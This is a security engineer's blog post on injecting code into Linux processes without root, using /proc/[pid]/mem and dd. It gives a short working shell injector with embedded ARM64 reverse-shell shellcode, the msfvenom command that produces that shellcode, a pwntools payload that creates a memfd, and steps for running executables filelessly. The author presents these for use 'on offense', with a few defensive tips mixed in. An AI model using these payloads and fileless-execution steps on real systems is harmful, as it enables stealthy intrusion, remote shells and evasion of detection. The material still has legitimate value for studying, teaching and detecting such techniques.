joev.dev - thoughts, engineering, art, life
Posts About
written Aug 13 2023

I'm joev, a security engineer 👋 You may know me from my work at Apple or on Metasploit, or from my CVEs.

Nowadays I work on open-source security software. This site is a cryptographic experiment of sorts, and a place to store my photos.

Say hello: @joev@infosec.exchange

Unprivileged Process Injection Techniques in Linux

In this post I'll cover the history of process injection implementations on Linux, and share a somewhat different and simpler implementation aimed at learning and portability.

When pentesting Linux boxes, you often end up in a common situation: you have command execution as a non-root user and want to stage some native code to run on the target. There are a number of methods to accomplish this, but they can be roughly categorized into the following:

  1. Use shell commands to write the native code to a file somewhere, and exec() or LD_PRELOAD the code.
  2. Use ptrace() or /proc/PID/mem to debug a sacrificial victim process and plant your native code inside of it.

There are downsides to #1; you need a decoding routine, as shell scripts cannot contain binary data. Additionally, you need a writable location on disk; this is not always true in e.g. read-only chroots, filesystems, containers, etc. Finally, many intrusion detection systems look specifically for #1 and alert on it, as it is a typical behavior of malware to stage and run a native implant in a straightforward and widely compatible way.

This post will look at #2.

Process Injection using ptrace()

On Linux you use the ptrace syscall to remotely control the execution of a process and read/write into its memory. This is a pretty suspicious syscall to trigger in an infected process, and from a command injection entrypoint there are not many ways to control it (gdb being one way). Further most Linux distros implement a sysctl called kernel/yama/ptrace_scope that controls what processes can be ptraced by an unprivileged user:

The sysctl settings (writable only with CAP_SYS_PTRACE) are:

0 - classic ptrace permissions: a process can PTRACE_ATTACH to any other
    process running under the same uid, as long as it is dumpable (i.e.
    did not transition uids, start privileged, or have called
    prctl(PR_SET_DUMPABLE...) already). Similarly, PTRACE_TRACEME is
    unchanged.

1 - restricted ptrace: a process must have a predefined relationship
    with the inferior it wants to call PTRACE_ATTACH on. By default,
    this relationship is that of only its descendants when the above
    classic criteria is also met. To change the relationship, an
    inferior can call prctl(PR_SET_PTRACER, debugger, ...) to declare
    an allowed debugger PID to call PTRACE_ATTACH on the inferior.
    Using PTRACE_TRACEME is unchanged.

2 - admin-only attach: only processes with CAP_SYS_PTRACE may use ptrace
    with PTRACE_ATTACH, or through children calling PTRACE_TRACEME.

3 - no attach: no processes may use ptrace with PTRACE_ATTACH nor via
    PTRACE_TRACEME. Once set, this sysctl value cannot be changed.

Most modern production systems set 1, "restricted ptrace", meaning non-root users can only really ptrace child processes. So a simple way to inject code would be to start a sleep child process, attach to it with exec gdb, then go to the current instruction pointer and overwrite the memory it points to with your shellcode. But again, this requires gdb on the box (usually rare) and is pretty noisy.

On defense, setting 2 is often a good recommendation to make, as it prevents any runtime debugging shenanigans without admin privs, and negates this entire class of techniques for non-root users.

The /proc/[pid]/mem devices

On Linux systems, the procfs mount implements mem device files for all processes in the namespace, available at /proc/[pid]/mem. These devices allow using standard filesystem syscalls to manipulate remote process memory. Behind the scenes, they are more or less a clone of parts of the existing ptrace syscalls; and in fact use the same ptrace_scope sysctl and resulting permissions.

This allows us to use standard (util-linux and coreutils) commands (like dd or printf) to seek through and overwrite remote process memory via these device files; which lets us stage native code quietly and without needing a writable location on disk or relying on esoteric binaries. As such, nearly all implementations of process injection on Linux that I have seen use /proc/[pid]/mem for injection.

On defense, consider adding a weighted alert on anomalous attempts to ptrace() or open("/proc/*/mem", "w")

A brief history of /proc/[pid]/mem injections

The first time I saw this technique used was 2017, in a tool now called GDSSecurity/Cegua mentioned in this blog post. I will summarize it below because what the author did was brilliant; but also abject lunacy, in any case it got the job done for them:

  1. Spawn sacrificial child process
  2. Read /proc/[pid]/maps to gather address of child process's stack
  3. kill -STOP the child
  4. Open child process's /proc/[pid]/mem device
  5. Use GNU binary grep to… dynamically search for rop gadgets and build a rop chain that stack pivots into shellcode (????)
  6. Use dd to overwrite the child's stack memory with the rop chain and shellcode
  7. kill -CONT the child

Now this is crazy cool, but as the author admits later, the ROP chain is unnecessary. It suffices to just plop some shellcode into memory and have the remote process execute it, which the author eventually realized.

If you are wondering "why can you overwrite a process's executable memory without changing the memory's NX flags?", basically the Linux kernel helpfully disables write protections during use of ptrace write calls, for developer convenience. A good explanation of how this is achieved amidst things like hardware-based memory protections can be found here.

In 2018, rb from Sektor7 wrote a comprehensive article on use of ptrace and /proc/*/mem techniques for in-memory shellcode injection on Linux. I highly recommend reading this as a starting point, as it provides a simple (but version/offset-dependent) injection script example at the end.

Following this there were a number of tools developed with similar, evolving techniques for Linux process injection. DavidBuchanan314/dlinject is a more straightforward implementation, but requires python on the target. arget13/DDexec improves on this by using /bin/sh instead of python, and researching and documenting how to avoid command dependencies. DDExec works by overwriting /proc/self/mem in a forked shell process; which is sort of like a process performing brain surgery on itself 🤯. Recently the same dlinject author wrote DavidBuchanan314/stelf-loader, which builds on this approach but with an extremely interesting implementation - it lets you provide an ELF input instead of shellcode and handles transparently loading it into memory for you.

On offense, writing tools that run on all the Linux distros (and modern containers) is an art in itself. The best advice IMHO to write tools that live forever is: know the POSIX shell spec, and try to avoid exec()ing to other commands - when you must, only rely on broad packages: utils-linux and coreutils are good starting points.

Rolling our own simple implementation

After reviewing the state of the art here, I like to use a much dumber approach: one that requires very little effort to implement but retains wide compatibility across Linux environments. It just does this:

  1. From a shell, open a write fd to /proc/self/mem
  2. Read /proc/self/syscall to find the return address of the read() syscall
  3. In a child subshell, skip the fd to this address using dd skip=..., then write your shellcode payload
  4. The parent process will then read() from the child process, triggering the payload

This is written to only require dd (part of coreutils) and absolutely nothing else. It can be pulled together in 4 lines of portable POSIX shell script, here you go:

PAYLOAD='\002\000\240\343\001\020\240\343\005\040\201\342\214\160'\
'\240\343\215\160\207\342\000\000\000\357\000\140\240\341\140\020'\
'\217\342\020\040\240\343\215\160\240\343\216\160\207\342\000\000'\
'\000\357\006\000\240\341\000\020\240\343\077\160\240\343\000\000'\
'\000\357\006\000\240\341\001\020\240\343\077\160\240\343\000\000'\
'\000\357\006\000\240\341\002\020\240\343\077\160\240\343\000\000'\
'\000\357\044\000\217\342\004\100\044\340\020\000\055\351\015\040'\
'\240\341\044\100\217\342\020\000\055\351\015\020\240\341\013\160'\
'\240\343\000\000\000\357\002\000\025\263\177\000\000\001\057\142'\
'\151\156\057\163\150\000\000\000\000\000\000\000\000\000\163\150'\
'\000\000\000\000\000\000\000\000\000\000\000\000\000\000'
(
exec 5>/proc/self/mem 
read -r _ _ _ _ _ _ _ _ ADDR </proc/self/syscall
( dd count=0 bs=1 skip=$((ADDR)) <&5; printf "${PAYLOAD}" >&5 )
) &

Pro tip: On offense, use printf with \000 octal for decoding embedded binary data within a shell script; it's the only binary decoding routine guaranteed by the POSIX sh spec.

The shellcode above is for the ARM64 architecture, generated by metasploit and encoded into octal; it connects a TCP reverse shell over to a listener on 127.0.0.1:5555. Here is how I generated it (use aarch64 for ARM64 and x64 for X86_64):

$ docker run -it metasploitframework/metasploit-framework bash
> ./msfvenom -p linux/aarch64/shell_reverse_tcp lhost=127.0.0.1 lport=5555 -f raw | \
    ruby -e 'STDIN.read.bytes.each { |b| printf "\\%03o", b }'

Of course a reverse shell payload is not practical at all; we already have command execution in this situation. The much more useful thing to do is to create a memory-backed fd that we can then write an arbitrary ELF executable to and execute. So we'll tweak the shellcode payload a bit to do this. You can use metasm_shell.rb to do this in metasploit, but pwntools makes things a bit easier IMO, as it is architecture-agnostic. We'll have the shellcode call memfd_create, then send itself a SIG_STOP so we can use the memfd from our original shell:

$ docker run --platform linux/amd64 -it pwntools/pwntools
pwntools@d7869fd2a307:/$ python
>>> from pwn import *
import sys
context.arch = 'arm64'
sc = asm(shellcraft.memfd_create("", 0)) + asm(shellcraft.kill(0, 19))
output = ""
for b in sc:
    output += "\\%03o" % (b)

print("PAYLOAD='%s'" % (output))

Which yields:

PAYLOAD='\356\003\037\252\356\017\037\370\340\003\000\221\341\003\037'\
'\252\350\042\200\322\001\000\000\324\340\003\037\252\141\002\200\322'\
'\050\020\200\322\001\000\000\324'

After executing the above shellcode, we can find the writable memfd handle number by consulting the child process:

$ CHILD=$!
$ ls -al /proc/$CHILD/fd/
total 0
dr-x------    2 msf      msf              0 Aug 29 20:45 .
dr-xr-xr-x    9 msf      msf              0 Aug 29 20:44 ..
lrwx------    1 msf      msf             64 Aug 29 20:45 0 -> /dev/pts/0
lrwx------    1 msf      msf             64 Aug 29 20:45 1 -> /dev/pts/0
lrwx------    1 msf      msf             64 Aug 29 20:45 2 -> /dev/pts/0
lrwx------    1 msf      msf             64 Aug 29 20:45 255 -> /dev/pts/0
lrwx------    1 msf      msf             64 Aug 29 20:45 3 -> /memfd: (deleted)
l-wx------    1 msf      msf             64 Aug 29 20:45 5 -> /proc/123/mem

We can then just use a series of printf statements to write our ELF executable to the memfd on fd#3, and execute it like normal.

$ printf '...' >> /proc/$CHILD/fd/3
$ /proc/$CHILD/fd/3 &

And that is one way to run executables on Linux without ever touching disk. This approach should work on all distributions of Linux, provided sys/kernel/yama/ptrace_scope is set to 1 or lower and the dd bin is available. If by some chance dd is missing (dd is part of coreutils, but you never know), see DDExec for a list of alternative common Linux commands that will seek a file descriptor to a desired offset.